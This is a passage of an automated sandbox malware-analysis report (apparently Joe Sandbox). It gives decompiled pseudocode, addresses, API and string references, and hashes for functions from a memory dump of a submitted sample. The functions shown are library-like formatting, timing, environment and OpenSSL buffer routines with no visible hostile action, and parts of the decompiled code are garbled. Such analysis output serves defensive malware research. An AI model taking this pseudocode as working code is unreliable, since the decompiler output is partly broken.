								_t214 = _v16 + 1;
								_t124 =  &_a16;
								 *_t124 = _a16 + 1;
								__eflags =  *_t124;
								_v16 = _t214;
								if( *_t124 < 0) {
									continue;
								}
								goto L78;
							}
						}
						L78:
						return _t143;
					} else {
						goto L18;
					}
				} else {
					_t220 = 0x19;
					_a16 = 0x19;
					L18:
					_t184 = _a100;
					_t217 = _t232;
					 *((char*)(_t253 + _t220 + 0x30)) = 0;
					_t208 = _t184 - _t220;
					_t235 = _t217 + 1;
					do {
						_t154 =  *_t217;
						_t217 = _t217 + 1;
					} while (_t154 != 0);
					_t218 = _t217 - _t235;
					_t156 =  >=  ? _t184 : _t220;
					_t237 = _a96 - ( >=  ? _t184 : _t220);
					_t268 = _a12;
					_t238 = _a96 - ( >=  ? _t184 : _t220) - (_t268 != 0);
					_t209 =  <  ? 0 : _t208;
					_t239 = _a96 - ( >=  ? _t184 : _t220) - (_t268 != 0) - _t217 - _t235;
					_a24 = _t209;
					_t240 =  <  ? 0 : _a96 - ( >=  ? _t184 : _t220) - (_t268 != 0) - _t217 - _t235;
					_t160 = _a104;
					_a96 = _t240;
					if((_t160 & 0x00000010) != 0) {
						_t246 =  >=  ? _t209 : _t240;
						_a24 =  >=  ? _t209 : _t240;
						_t240 = 0;
						_a96 = 0;
					}
					if((_t160 & 0x00000001) != 0) {
						_t240 =  ~_t240;
						_a96 = _t240;
					}
					_t64 =  &_a28; // 0x456c55
					_t185 =  *_t64;
					if(_t240 > 0) {
						_t226 = _a8;
						do {
							E00456F70(_t249, _t185, _t226, _v0, 0x20);
							_t240 = _t240 - 1;
							_t253 = _t253 + 0x14;
						} while (_t240 > 0);
						_t220 = _a16;
						_a96 = _t240;
					}
					_t161 = _a12;
					if(_a12 != 0) {
						E00456F70(_t249, _t185, _a8, _v0, _t161);
						_t253 = _t253 + 0x14;
					}
					_t163 =  *_a4;
					if( *_a4 != 0) {
						_t245 = _a8;
						_t225 = _v0;
						do {
							E00456F70(_t249, _t185, _t245, _t225, _t163);
							_t253 = _t253 + 0x14;
							_t174 = _a4 + 1;
							_a4 = _t174;
							_t163 =  *_t174;
						} while ( *_t174 != 0);
						_t240 = _a96;
						_t220 = _a16;
					}
					if(_a24 > 0) {
						_t244 = _a8;
						_t224 = _v0;
						do {
							E00456F70(_t249, _t185, _t244, _t224, 0x30);
							_t253 = _t253 + 0x14;
							_t170 = _a24 - 1;
							_a24 = _t170;
						} while (_t170 > 0);
						_t240 = _a96;
						_t220 = _a16;
					}
					if(_t220 > 0) {
						_t243 = _a8;
						do {
							_t166 =  *((char*)(_t253 + _t220 + 0x2f));
							_t220 = _t220 - 1;
							E00456F70(_t249, _t185, _t243, _v0, _t166);
							_t253 = _t253 + 0x14;
						} while (_t220 > 0);
						_t240 = _a96;
					}
					if(_t240 < 0) {
						_t242 =  ~_t240;
						do {
							E00456F70(_t249, _t185, _a8, _v0, 0x20);
							_t253 = _t253 + 0x14;
							_t242 = _t242 - 1;
						} while (_t242 != 0);
					}
					_pop(_t223);
					_pop(_t241);
					_pop(_t186);
					return E0042A77E(_t186, _a60 ^ _t253, _t218, _t223, _t241);
				}
			}

0x004573f5
0x004573fa
0x00457401
0x0045740b
0x00457410
0x00457415
0x00457419
0x00457422
0x00457430
0x00457434
0x00457438
0x0045743e
0x00457442
0x00457445
0x00457449
0x0045744d
0x00457454
0x00457456
0x00457458
0x00457470
0x00457473
0x0045747f
0x00457482
0x0045748a
0x0045748f
0x00457475
0x00457475
0x00457475
0x00457460
0x00457460
0x00457462
0x0045746a
0x0045746c
0x0045746c
0x00457458
0x00457493
0x0045749a
0x0045749f
0x004574ac
0x004574b6
0x004574b9
0x004574bd
0x004574a1
0x004574a6
0x004574a6
0x0045749f
0x004574c4
0x004574d3
0x004574db
0x004574dd
0x004574e2
0x004574e4
0x004574e9
0x004574ee
0x004574f2
0x004574f7
0x004574fd
0x004574fe
0x00457500
0x00000000
0x00000000
0x00457502
0x00457509
0x00000000
0x00000000
0x00000000
0x00457509
0x0045750b
0x0045750f
0x00457516
0x00457523
0x0045769f
0x004576a4
0x004576a5
0x004576a6
0x004576a7
0x004576a8
0x004576a9
0x004576aa
0x004576ab
0x004576ac
0x004576ad
0x004576ae
0x004576af
0x004576b5
0x004576ba
0x004576be
0x004576c0
0x004576c2
0x004576ca
0x004576cd
0x004576cf
0x004576d3
0x004576d5
0x004576d7
0x004576d7
0x004576d8
0x004576d8
0x004576d7
0x004576e5
0x004576e8
0x004576ed
0x004576f1
0x004576f3
0x004576f5
0x004576f5
0x004576f9
0x004576fa
0x004576fe
0x004576ff
0x00457703
0x00457704
0x00457708
0x00457709
0x0045770d
0x0045770f
0x00457715
0x00457715
0x00457719
0x00000000
0x00000000
0x0045771f
0x00457721
0x00457725
0x00457727
0x00457730
0x00457730
0x00457733
0x00457772
0x00457772
0x00457786
0x0045778b
0x0045778e
0x00457735
0x00457735
0x00457738
0x0045773a
0x0045773a
0x00457751
0x00457753
0x00457756
0x00457758
0x0045775a
0x00457761
0x00457766
0x00457766
0x00457769
0x00457769
0x00457792
0x00457792
0x00457796
0x00457796
0x00457727
0x0045779a
0x0045779c
0x0045779e
0x004577a0
0x004577a3
0x004577a5
0x004577af
0x004577a7
0x004577a7
0x004577a7
0x004577b3
0x004577b3
0x004577b3
0x004577b9
0x004577ba
0x004577bb
0x004577bf
0x004577c3
0x004577c5
0x00000000
0x00000000
0x00000000
0x004577c5
0x00457715
0x004577cb
0x004577cb
0x004577cf
0x004577d1
0x004577d3
0x004577d7
0x004577e0
0x004577e0
0x004577e4
0x00000000
0x00000000
0x004577ee
0x004577f7
0x004577fe
0x004577ff
0x00457803
0x00457806
0x00457808
0x00000000
0x00000000
0x00000000
0x00457808
0x004577e0
0x0045780a
0x0045780a
0x0045780f
0x00457811
0x00457811
0x00457815
0x00000000
0x00000000
0x0045781d
0x00457826
0x00457829
0x0045782a
0x0045782a
0x0045782a
0x0045782e
0x00457832
0x00000000
0x00000000
0x00000000
0x00457832
0x00457811
0x00457834
0x00457839
0x00000000
0x00000000
0x00000000
0x00457518
0x00457518
0x0045751d
0x00457529
0x00457529
0x0045752d
0x00457531
0x00457536
0x00457538
0x00457540
0x00457540
0x00457542
0x00457543
0x00457547
0x00457551
0x00457554
0x00457558
0x0045755f
0x00457565
0x00457568
0x0045756a
0x0045756e
0x00457571
0x00457575
0x0045757b
0x0045757f
0x00457582
0x00457586
0x00457588
0x00457588
0x0045758e
0x00457590
0x00457592
0x00457592
0x00457596
0x00457596
0x0045759c
0x0045759e
0x004575a2
0x004575ab
0x004575b0
0x004575b1
0x004575b4
0x004575b8
0x004575bc
0x004575bc
0x004575c0
0x004575c6
0x004575d3
0x004575d8
0x004575d8
0x004575df
0x004575e3
0x004575e5
0x004575e9
0x004575f0
0x004575f8
0x00457601
0x00457604
0x00457605
0x00457609
0x0045760b
0x0045760f
0x00457613
0x00457613
0x0045761c
0x0045761e
0x00457622
0x00457626
0x0045762c
0x00457635
0x00457638
0x00457639
0x0045763d
0x00457641
0x00457645
0x00457645
0x0045764b
0x0045764d
0x00457651
0x00457651
0x00457656
0x0045765f
0x00457664
0x00457667
0x0045766b
0x0045766b
0x00457671
0x00457673
0x00457675
0x00457681
0x00457686
0x00457689
0x00457689
0x00457675
0x00457690
0x00457691
0x00457693
0x0045769e
0x0045769e

APIs

__aulldvrm.LIBCMT ref: 004574E9

Strings

, xrefs: 00457482
+, xrefs: 00457475
0123456789ABCDEF, xrefs: 004574D6
UlE, xrefs: 00457596, 004575A9, 004575D1, 004575F6, 0045762A, 0045765D, 0045767F
0123456789abcdef, xrefs: 004574C4

Memory Dump Source

Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd

Yara matches

Similarity

API ID: __aulldvrm
String ID: $+$0123456789ABCDEF$0123456789abcdef$UlE
API String ID: 1302938615-3129329331
Opcode ID: 46cac4d1b6a149b0db06dd79d6caabf4c5257fe28ada6b330817daa996fb75e4
Instruction ID: ba297de4fec08f8b73c8771b24cc4328c1ae3ea447eff3a94226dc6813255680
Opcode Fuzzy Hash: 46cac4d1b6a149b0db06dd79d6caabf4c5257fe28ada6b330817daa996fb75e4
Instruction Fuzzy Hash: D181AEB1A087509FD710CF29A84062BBBE5BFC9755F15092EFD8593312E338DD098B96

Uniqueness

Uniqueness Score: -1.00%

Function 00411B10 Relevance: 10.6, APIs: 7, Instructions: 50
timewindowsleepCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00411B10() {
				intOrPtr _v8;
				struct tagMSG _v36;
				long _t9;
				long _t11;
				intOrPtr _t19;

				_t1 = timeGetTime() + 0x1388; // 0x1388
				_t19 = _t1;
				_v8 = _t19;
				_t9 = timeGetTime();
				if(_t19 > _t9) {
					do {
						_t11 = PeekMessageW( &_v36, 0, 0, 0, 1);
						if(_t11 == 0) {
							goto L5;
						}
						while(_v36.message != 0x12) {
							DispatchMessageW( &_v36);
							_t11 = PeekMessageW( &_v36, 0, 0, 0, 1);
							if(_t11 != 0) {
								continue;
							}
							goto L5;
						}
						break;
						L5:
						Sleep(0x64);
						_t11 = timeGetTime();
					} while (_v8 > _t11);
					return _t11;
				}
				return _t9;
			}

0x00411b20
0x00411b20
0x00411b26
0x00411b29
0x00411b2d
0x00411b40
0x00411b4c
0x00411b50
0x00000000
0x00000000
0x00411b52
0x00411b5c
0x00411b6a
0x00411b6e
0x00000000
0x00000000
0x00000000
0x00411b6e
0x00000000
0x00411b70
0x00411b72
0x00411b78
0x00411b7a
0x00000000
0x00411b7f
0x00411b85

APIs

timeGetTime.WINMM ref: 00411B1E
timeGetTime.WINMM ref: 00411B29
PeekMessageW.USER32 ref: 00411B4C
DispatchMessageW.USER32 ref: 00411B5C
PeekMessageW.USER32 ref: 00411B6A
Sleep.KERNEL32(00000064), ref: 00411B72
timeGetTime.WINMM ref: 00411B78

Memory Dump Source

Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd

Yara matches

Similarity

API ID: MessageTimetime$Peek$DispatchSleep
String ID:
API String ID: 3697694649-0
Opcode ID: fcc8413cfddb585fd402253dfe517567f0959867a63999003a9cc793a607e07b
Instruction ID: 47d0c5dc5d1eae46eaa001befe89e32fbe66e83151f6641dec248f991c3ab793
Opcode Fuzzy Hash: fcc8413cfddb585fd402253dfe517567f0959867a63999003a9cc793a607e07b
Instruction Fuzzy Hash: EE017532A40319A6DB2097E59C81FEEB768AB44B40F044066FB04A71D0E664A9418BA9

Uniqueness

Uniqueness Score: -1.00%

Function 004416EB Relevance: 9.1, APIs: 6, Instructions: 112
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E004416EB(void* __ebx, void* __edx, void* __edi, void* __esi, signed int _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v32;
				signed int _t16;
				intOrPtr _t17;
				signed int _t19;
				signed int _t20;
				signed int _t30;
				intOrPtr* _t35;
				intOrPtr* _t37;
				signed int* _t40;
				void* _t48;
				signed int _t50;
				signed int _t54;
				signed int _t57;
				intOrPtr _t58;
				intOrPtr _t59;

				_t48 = __edx;
				_t40 = _a4;
				_t65 = _t40;
				if(_t40 != 0) {
					 *_t40 =  *_t40 & 0x00000000;
					_t54 = _a12;
					_t50 = _a8;
					__eflags = _t50;
					if(_t50 == 0) {
						__eflags = _t54;
						if(__eflags == 0) {
							goto L4;
						} else {
							goto L13;
						}
					} else {
						__eflags = _t54;
						if(__eflags == 0) {
							L13:
							_t35 = E00425208(__eflags);
							_t58 = 0x16;
							 *_t35 = _t58;
							E004242D2();
							_t17 = _t58;
							goto L10;
						} else {
							L4:
							__eflags = _t50;
							if(_t50 != 0) {
								 *_t50 = 0;
							}
							_t16 = E00441667(_a16);
							_a4 = _t16;
							__eflags = _t16;
							if(_t16 == 0) {
								L15:
								_t17 = 0;
								goto L10;
							} else {
								_t19 = E0042C160(_t16) + 1;
								 *_t40 = _t19;
								__eflags = _t54;
								if(_t54 == 0) {
									goto L15;
								} else {
									__eflags = _t19 - _t54;
									if(_t19 <= _t54) {
										_t20 = E0042C0FD(_t50, _t54, _a4);
										__eflags = _t20;
										if(_t20 != 0) {
											_push(0);
											_push(0);
											_push(0);
											_push(0);
											_push(0);
											E004242FD(_t40, _t48);
											asm("int3");
											_push(0xc);
											_push(0x508078);
											E00428520(_t40, _t50, _t54);
											_v32 = _v32 & 0x00000000;
											_t56 = _a4;
											__eflags = _a4;
											__eflags = 0 | _a4 != 0x00000000;
											if(__eflags != 0) {
												__eflags = E00448FF4(_t56, 0x7fff) - 0x7fff;
												asm("sbb eax, eax");
												if(__eflags == 0) {
													goto L17;
												} else {
													E00428AF7(7);
													_t12 =  &_v8;
													 *_t12 = _v8 & 0x00000000;
													__eflags =  *_t12;
													_t57 = E00441667(_t56);
													_v32 = _t57;
													_v8 = 0xfffffffe;
													E004417FD();
													_t30 = _t57;
												}
											} else {
												L17:
												 *((intOrPtr*)(E00425208(__eflags))) = 0x16;
												E004242D2();
												_t30 = 0;
											}
											return E00428565(_t30);
										} else {
											goto L15;
										}
									} else {
										_t17 = 0x22;
										L10:
										goto L11;
									}
								}
							}
						}
					}
				} else {
					_t37 = E00425208(_t65);
					_t59 = 0x16;
					 *_t37 = _t59;
					E004242D2();
					_t17 = _t59;
					L11:
					return _t17;
				}
			}

0x004416eb
0x004416ef
0x004416f3
0x004416f5
0x0044170a
0x0044170d
0x00441711
0x00441714
0x00441716
0x0044174d
0x0044174f
0x00000000
0x00000000
0x00000000
0x00000000
0x00441718
0x00441718
0x0044171a
0x00441751
0x00441751
0x00441758
0x00441759
0x0044175b
0x00441760
0x00000000
0x0044171c
0x0044171c
0x0044171c
0x0044171e
0x00441720
0x00441720
0x00441726
0x0044172b
0x0044172f
0x00441731
0x00441775
0x00441775
0x00000000
0x00441733
0x00441739
0x0044173a
0x0044173d
0x0044173f
0x00000000
0x00441741
0x00441741
0x00441743
0x00441769
0x00441771
0x00441773
0x0044177b
0x0044177c
0x0044177d
0x0044177e
0x0044177f
0x00441780
0x00441785
0x00441786
0x00441788
0x0044178d
0x00441792
0x00441798
0x0044179b
0x004417a0
0x004417a2
0x004417c6
0x004417c8
0x004417cc
0x00000000
0x004417ce
0x004417d0
0x004417d6
0x004417d6
0x004417d6
0x004417e1
0x004417e3
0x004417e6
0x004417ed
0x004417f2
0x004417f2
0x004417a4
0x004417a4
0x004417a9
0x004417af
0x004417b4
0x004417b4
0x004417f9
0x00000000
0x00000000
0x00000000
0x00441745
0x00441747
0x00441748
0x00000000
0x00441748
0x00441743
0x0044173f
0x00441731
0x0044171a
0x004416f7
0x004416f7
0x004416fe
0x004416ff
0x00441701
0x00441706
0x00441749
0x0044174c
0x0044174c

APIs

__getenv_helper_nolock.LIBCMT ref: 00441726
__invoke_watson.LIBCMT ref: 00441780
_strlen.LIBCMT ref: 00441734

Part of subcall function 00425208: __getptd_noexit.LIBCMT ref: 00425208

_strnlen.LIBCMT ref: 004417BF
__lock.LIBCMT ref: 004417D0
__getenv_helper_nolock.LIBCMT ref: 004417DB

Memory Dump Source

Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd

Yara matches

Similarity

API ID: __getenv_helper_nolock$__getptd_noexit__invoke_watson__lock_strlen_strnlen
String ID:
API String ID: 3534693527-0
Opcode ID: 7b5cd30b09028c4688c7add7ba7a2b705b2aa5fc65eb7c357d53e3922a347f5d
Instruction ID: 706a9fbf285425ec29b4e33d2635255339e15eb248031f995e6227ac9da9c0f4
Opcode Fuzzy Hash: 7b5cd30b09028c4688c7add7ba7a2b705b2aa5fc65eb7c357d53e3922a347f5d
Instruction Fuzzy Hash: A131FC31741235ABEB216BA6EC02B9F76949F44B64F54015BF814DB391DF7CC88046AD

Uniqueness

Uniqueness Score: -1.00%

Function 004506A0 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 119
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 29%

			E004506A0(void* __ebp, intOrPtr _a4, signed int _a8, intOrPtr _a12, char _a16, char _a80, char _a144, signed int _a208, unsigned int _a216, intOrPtr* _a220, intOrPtr _a224) {
				intOrPtr _v0;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				intOrPtr _t35;
				intOrPtr _t43;
				char* _t46;
				intOrPtr _t54;
				intOrPtr _t55;
				intOrPtr* _t57;
				void* _t65;
				void* _t66;
				intOrPtr* _t67;
				unsigned int _t68;
				void* _t69;
				signed int _t73;
				intOrPtr _t74;
				signed int _t75;
				void* _t76;
				signed int _t77;

				E0042F7C0(0xd4);
				_t29 =  *0x50ad20; // 0x84f4da2
				_a208 = _t29 ^ _t75;
				_t54 = _a224;
				_t68 = _a216;
				_t67 = _a220;
				_t73 = _t68 >> 0x0000000c & 0x00000fff;
				_a8 = _t68 & 0x00000fff;
				_a4 = E00450DF0(_t54, _t65, _t67, _t73, _t68);
				_v0 = E00450870(_t54, _t67, _t73, _t68);
				_t35 = E004513B0(_t54, _t65, _t67, _t73, _t68);
				_t76 = _t75 + 0xc;
				_a12 = _t35;
				if(_a4 == 0) {
					_push(_t68 >> 0x18);
					_push("lib(%lu)");
					_push(0x40);
					_push( &_a144);
					E004567A0(_t68 >> 0x18);
					_t76 = _t76 + 0x10;
				}
				_t81 = _v0;
				if(_v0 == 0) {
					_push(_t73);
					_push("func(%lu)");
					_push(0x40);
					_push( &_a80);
					E004567A0(_t81);
					_t76 = _t76 + 0x10;
				}
				_t74 = _a12;
				_t82 = _t74;
				if(_t74 == 0) {
					_push(_a8);
					_push("reason(%lu)");
					_push(0x40);
					_push( &_a16);
					E004567A0(_t82);
					_t76 = _t76 + 0x10;
				}
				_t55 = _v0;
				_t37 =  !=  ? _t74 :  &_a16;
				_push( !=  ? _t74 :  &_a16);
				_t39 =  !=  ? _t55 :  &_a80;
				_push( !=  ? _t55 :  &_a80);
				_t41 =  !=  ? _a4 :  &_a144;
				E004567A0(_a4, _t67, _t54, "error:%08lX:%s:%s:%s", _t68,  !=  ? _a4 :  &_a144);
				_t57 = _t67;
				_t77 = _t76 + 0x1c;
				_t66 = _t57 + 1;
				do {
					_t43 =  *_t57;
					_t57 = _t57 + 1;
				} while (_t43 != 0);
				if(_t57 - _t66 == _t54 - 1 && _t54 > 4) {
					_t69 = 0;
					_t54 = _t54 + _t67;
					do {
						_t46 = E00431C30(_t67, 0x3a);
						_t77 = _t77 + 8;
						if(_t46 == 0 || _t46 > _t54 - 5 + _t69) {
							_t46 = _t54 - 5 + _t69;
							 *_t46 = 0x3a;
						}
						_t69 = _t69 + 1;
						_t67 = _t46 + 1;
					} while (_t69 < 4);
				}
				return E0042A77E(_t54, _a208 ^ _t77, _t66, _t67, _t68);
			}

0x004506a5
0x004506aa
0x004506b1
0x004506b9
0x004506c2
0x004506cc
0x004506de
0x004506e4
0x004506ee
0x004506f8
0x004506fc
0x00450701
0x00450704
0x0045070d
0x0045071b
0x0045071c
0x00450721
0x00450723
0x00450724
0x00450729
0x00450729
0x0045072c
0x00450731
0x00450733
0x00450734
0x0045073d
0x0045073f
0x00450740
0x00450745
0x00450745
0x00450748
0x0045074c
0x0045074e
0x00450750
0x00450758
0x0045075d
0x0045075f
0x00450760
0x00450765
0x00450765
0x00450768
0x00450772
0x00450777
0x0045077c
0x00450783
0x0045078d
0x00450799
0x0045079e
0x004507a0
0x004507a3
0x004507a6
0x004507a6
0x004507a8
0x004507a9
0x004507b4
0x004507bb
0x004507bd
0x004507c0
0x004507c3
0x004507c8
0x004507cd
0x004507db
0x004507dd
0x004507dd
0x004507e0
0x004507e1
0x004507e4
0x004507c0
0x00450801

APIs

___from_strstr_to_strchr.LIBCMT ref: 004507C3

Strings

func(%lu), xrefs: 00450734
error:%08lX:%s:%s:%s, xrefs: 00450792
lib(%lu), xrefs: 0045071C
reason(%lu), xrefs: 00450758

Memory Dump Source

Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd

Yara matches

Similarity

API ID: ___from_strstr_to_strchr
String ID: error:%08lX:%s:%s:%s$func(%lu)$lib(%lu)$reason(%lu)
API String ID: 601868998-2416195885
Opcode ID: 46bb62eb4ffcb3ef403e86853a7eb45dbe6c4dfbd3a8551aa62d907c1259c874
Instruction ID: 4fd155d7ac4cfc4ad9107eba643b63d3b81161049ee91e28a54c83c9030a6459
Opcode Fuzzy Hash: 46bb62eb4ffcb3ef403e86853a7eb45dbe6c4dfbd3a8551aa62d907c1259c874
Instruction Fuzzy Hash: F64109756043055BDB20EE25CC45BAFB7D8EF85309F40082FF98593242E679E90C8B96

Uniqueness

Uniqueness Score: -1.00%

Function 0045AE30 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 105
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 97%

			E0045AE30(void* __ebx, void* __edx, void* __ebp, char _a4, char _a8) {
				void* __edi;
				intOrPtr _t18;
				intOrPtr _t19;
				signed int _t40;
				intOrPtr _t43;
				signed int _t44;
				intOrPtr _t51;
				intOrPtr* _t52;
				intOrPtr _t53;

				_t55 = __ebp;
				_t1 =  &_a8; // 0x463967
				_t53 =  *_t1;
				_t2 =  &_a4; // 0x463967
				_t52 =  *_t2;
				_t43 =  *_t52;
				if(_t43 < _t53) {
					__eflags =  *(_t52 + 8) - _t53;
					if( *(_t52 + 8) < _t53) {
						__eflags = _t53 - 0x5ffffffc;
						if(__eflags <= 0) {
							_t44 = _t53 + 3;
							_t50 = 0xaaaaaaab * _t44 >> 0x20;
							_t18 =  *((intOrPtr*)(_t52 + 4));
							_push(__ebx);
							_t40 = 0xaaaaaaab * _t44 >> 0x20 >> 1 << 2;
							__eflags = _t18;
							if(_t18 != 0) {
								_t19 = E00454FB0(_t50, _t18,  *(_t52 + 8), _t40, ".\\crypto\\buffer\\buffer.c", 0xa6);
							} else {
								_t19 = E00454E50(_t40, ".\\crypto\\buffer\\buffer.c", 0xa4);
							}
							_t51 = _t19;
							__eflags = _t51;
							if(__eflags != 0) {
								__eflags = _t53 -  *_t52;
								 *((intOrPtr*)(_t52 + 4)) = _t51;
								 *(_t52 + 8) = _t40;
								E0042B420( *_t52 + _t51, 0, _t53 -  *_t52);
								 *_t52 = _t53;
								return _t53;
							} else {
								E004512D0(_t40, _t51, _t52, _t55, __eflags, 7, 0x69, 0x41, ".\\crypto\\buffer\\buffer.c", 0xa9);
								__eflags = 0;
								return 0;
							}
						} else {
							E004512D0(__ebx, __edx, _t52, __ebp, __eflags, 7, 0x69, 0x41, ".\\crypto\\buffer\\buffer.c", 0x9f);
							__eflags = 0;
							return 0;
						}
					} else {
						__eflags =  *((intOrPtr*)(_t52 + 4)) + _t43;
						E0042B420( *((intOrPtr*)(_t52 + 4)) + _t43, 0, _t53 - _t43);
						 *_t52 = _t53;
						return _t53;
					}
				} else {
					E0042B420( *((intOrPtr*)(_t52 + 4)) + _t53, 0, _t43 - _t53);
					 *_t52 = _t53;
					return _t53;
				}
			}

0x0045ae30
0x0045ae31
0x0045ae31
0x0045ae36
0x0045ae36
0x0045ae3a
0x0045ae3e
0x0045ae5a
0x0045ae5d
0x0045ae7b
0x0045ae81
0x0045aea0
0x0045aea8
0x0045aeaa
0x0045aead
0x0045aeb2
0x0045aeb5
0x0045aeb7
0x0045aedd
0x0045aeb9
0x0045aec4
0x0045aec9
0x0045aee5
0x0045aee7
0x0045aee9
0x0045af0f
0x0045af11
0x0045af1a
0x0045af1e
0x0045af26
0x0045af2d
0x0045aeeb
0x0045aefb
0x0045af03
0x0045af0a
0x0045af0a
0x0045ae83
0x0045ae93
0x0045ae9b
0x0045ae9f
0x0045ae9f
0x0045ae5f
0x0045ae67
0x0045ae6c
0x0045ae74
0x0045ae7a
0x0045ae7a
0x0045ae40
0x0045ae4b
0x0045ae53
0x0045ae59
0x0045ae59

APIs

_memset.LIBCMT ref: 0045AE4B
_memset.LIBCMT ref: 0045AE6C

Strings

g9F, xrefs: 0045AE31, 0045AE36, 0045AE63, 0045AF14, 0045AF1D
.\crypto\buffer\buffer.c, xrefs: 0045AE88, 0045AEBE, 0045AED3, 0045AEF0

Memory Dump Source

Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd

Yara matches

Similarity

API ID: _memset
String ID: .\crypto\buffer\buffer.c$g9F
API String ID: 2102423945-3653307630
Opcode ID: 41b8760603798dafaf4d4572c250bcd82449d7f0d7c455ebd7b4e1b6c976a6df
Instruction ID: 958ac6a2dbe7618ecd56aaf11cdfe4c63fb5daf7b6a990d4d23814bb8d8bf6ac
Opcode Fuzzy Hash: 41b8760603798dafaf4d4572c250bcd82449d7f0d7c455ebd7b4e1b6c976a6df
Instruction Fuzzy Hash: 27212BB6B403213FE210665DFC43B66B399EB84B15F10413BF618D73C2D6A8A865C3D9

Uniqueness

Uniqueness Score: -1.00%

Function 00425341 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 91
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 62%

			E00425341(void* __ebx, void* __edi, intOrPtr _a4) {
				char* _v24;
				intOrPtr _v28;
				signed int _v36;
				signed int _v40;
				short _v300;
				void* __esi;
				void* _t15;
				void* _t17;
				signed int _t20;
				char* _t22;
				signed int _t30;
				void* _t40;
				void* _t42;
				void* _t46;
				void* _t47;
				void* _t49;
				void* _t51;
				signed int _t52;

				if(_a4 != 0) {
					_push(__ebx);
					_t30 = E0043749C(_a4, 0x55);
					if(_t30 < 0x55) {
						_push(__edi);
						_t15 = E00428CDE(_t40, 2 + _t30 * 2);
						_t42 = _t15;
						if(_t42 != 0) {
							_t5 = _t30 + 1; // 0x1
							_t17 = E004374F1(_t42, _t5, _a4, _t5);
							_t52 = _t51 + 0x10;
							if(_t17 != 0) {
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								E004242FD(_t30, _t40);
								asm("int3");
								_t49 = _t47;
								_push(_t49);
								_t50 = _t52;
								_t20 =  *0x50ad20; // 0x84f4da2
								_v40 = _t20 ^ _t52;
								_t22 = _v24;
								_t45 = _v28;
								if(_v28 <= 5 && _t22 != 0 && MultiByteToWideChar(0, 0, _t22, 0xffffffff,  &_v300, 0x83) != 0) {
									E00425A97(_t30, _t40, _t45,  &_v300);
								}
								_pop(_t46);
								return E0042A77E(_t30, _v36 ^ _t50, _t40, _t42, _t46);
							} else {
								_t15 = _t42;
								goto L5;
							}
						} else {
							L5:
							goto L6;
						}
					} else {
						_t15 = 0;
						L6:
						return _t15;
					}
				} else {
					return 0;
				}
			}

0x00425348
0x0042534e
0x00425359
0x00425360
0x0042536d
0x0042536f
0x00425374
0x00425379
0x0042537f
0x00425388
0x0042538d
0x00425392
0x0042539a
0x0042539b
0x0042539c
0x0042539d
0x0042539e
0x0042539f
0x004253a4
0x004253a8
0x004255d8
0x004255d9
0x004255e1
0x004255e8
0x004255eb
0x004255ef
0x004255f5
0x00425620
0x00425626
0x00425630
0x00425639
0x00425394
0x00425394
0x00000000
0x00425394
0x0042537b
0x0042537b
0x00000000
0x0042537b
0x00425362
0x00425362
0x0042537c
0x0042537e
0x0042537e
0x0042534a
0x0042534d
0x0042534d

APIs

_wcsnlen.LIBCMT ref: 00425354

Strings

U, xrefs: 0042535D

Memory Dump Source

Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd

Yara matches

Similarity

API ID: _wcsnlen
String ID: U
API String ID: 3628947076-3372436214
Opcode ID: b6ca082fea440d1ca5cff6801f17e255d65e87a8c4bbbad4e9973a502f76dbd1
Instruction ID: 96f9a77ca4cc4fe958c434aa827cb810c13d5acf0ea92317e974609e7887e837
